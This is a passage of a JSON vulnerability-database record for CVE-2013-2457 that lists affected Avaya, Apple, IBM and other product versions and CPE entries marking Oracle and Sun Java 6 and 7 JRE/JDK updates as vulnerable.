"eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ir", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "conferencing standard edition sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r15", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "call management system r17.0", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.6" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.7" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere real time sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere message broker", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.12" }, { "model": "virtualization engine ts7700", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.31.0.89" }, { "model": "tivoli system automation for integrated operations management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.5" }, { "model": "lotus notes fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "lotus domino fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "java sdk sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr14", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr13-fp18", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "integration bus", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" } ], "sources": [ { "db": "BID", "id": "60632" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "db": "NVD", "id": "CVE-2013-2457" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update21:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update21:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 